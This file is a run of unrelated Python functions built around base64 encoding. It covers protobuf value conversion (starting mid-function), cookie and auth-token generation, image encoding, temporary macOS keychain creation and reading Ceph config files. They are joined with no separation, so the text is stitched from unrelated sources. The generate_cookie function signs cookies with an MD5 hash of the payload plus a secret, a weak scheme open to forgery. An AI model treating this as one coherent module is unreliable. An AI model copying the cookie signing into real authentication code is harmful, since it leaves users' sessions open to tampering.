    if cpp_type == field_desc.CPPTYPE_STRING:
        if field.type == field_desc.TYPE_BYTES:
            # Use base64 Data encoding for bytes
            return base64.b64encode(value).decode('utf-8')
        return value

    if cpp_type == field_desc.CPPTYPE_BOOL:
        return bool(value)

    if cpp_type in _INT64_TYPES:
        return str(value)

    if cpp_type in _FLOAT_TYPES:
        if math.isinf(value):
            return _NEG_INFINITY if value < 0.0 else _INFINITY
        if math.isnan(value):
            return _NAN

    return value
def generate_cookie(name, securekey):
    """Build a cookie of the form ``<base64 JSON>.<md5 hex digest>``.

    The JSON part holds *name* and the current ``time.asctime()``; the
    digest is computed over the JSON text followed by *securekey*.
    """
    payload = json.dumps({
        'name': name,
        'login-time': time.asctime()
    })
    # b64encode() yields bytes while hexdigest() yields text, so the first
    # part is decoded before the two are joined.
    encoded = base64.b64encode(payload.encode('ascii')).decode('utf-8')
    signature = hashlib.md5((payload + securekey).encode('ascii')).hexdigest()
    return encoded + "." + signature
def generate_auth_token(self, expiration = 3600):
    """Return a base64 text token carrying this object's ``id``.

    The token is produced by a Serializer keyed with the app's SECRET_KEY
    and created with ``expires_in`` set to *expiration*.
    """
    serializer = Serializer(app.config['SECRET_KEY'], expires_in=expiration)
    signed = serializer.dumps({'id': self.id})
    return b64encode(signed).decode('utf-8')
def get_image_as_base64(filename):
    """Return the content of *filename* as base64 ASCII text."""
    with open(filename, 'rb') as fp:
        encoded = base64.b64encode(fp.read())
    return encoded.decode('ascii')
def _temporary_keychain():
    """
    This function creates a temporary Mac keychain that we can use to work with
    credentials. This keychain uses a one-time password and a temporary file to
    store the data. We expect to have one keychain per socket. The returned
    SecKeychainRef must be freed by the caller, including calling
    SecKeychainDelete.

    Returns a tuple of the SecKeychainRef and the path to the temporary
    directory that contains it.
    """
    # Unfortunately, SecKeychainCreate requires a path to a keychain. This
    # means we cannot use mkstemp to use a generic temporary file. Instead,
    # we're going to create a temporary directory and a filename to use there.
    # This filename will be 8 random bytes expanded into hex. We also need
    # some random bytes to password-protect the keychain we're creating, so we
    # ask for 40 random bytes.
    random_bytes = os.urandom(40)
    # Base16 rather than base64 for the filename: the base64 alphabet
    # contains '/', which would make os.path.join() point into a
    # sub-directory that does not exist.
    filename = base64.b16encode(random_bytes[:8]).decode('utf-8')
    password = base64.b64encode(random_bytes[8:])  # Must be valid UTF-8
    tempdirectory = tempfile.mkdtemp()

    keychain_path = os.path.join(tempdirectory, filename).encode('utf-8')

    # We now want to create the keychain itself.
    keychain = Security.SecKeychainRef()
    status = Security.SecKeychainCreate(
        keychain_path,
        len(password),
        password,
        False,
        None,
        ctypes.byref(keychain)
    )
    _assert_no_error(status)

    # Having created the keychain, we want to pass it off to the caller.
    return keychain, tempdirectory
def read_file(filename):
    """Read *filename* relative to ``/etc/ceph`` and return its encoded content.

    The result dict holds the zlib-compressed, base64-encoded content, the
    SHA-1 hex digest of the raw bytes, and the *filename* as given. Missing
    or unreadable files are reported through ``json_exit``.
    """
    filename_path = os.path.join('/etc/ceph', filename)

    if not os.path.exists(filename_path):
        json_exit("file not found: {}".format(filename_path), failed=True)
    if not os.access(filename_path, os.R_OK):
        json_exit("file not readable: {}".format(filename_path), failed=True)

    with open(filename_path, 'rb') as handle:
        raw_data = handle.read()

    compressed = zlib.compress(raw_data)
    digest = hashlib.sha1(raw_data).hexdigest()
    return {
        'content': base64.b64encode(compressed),
        'sha1': digest,
        'filename': filename
    }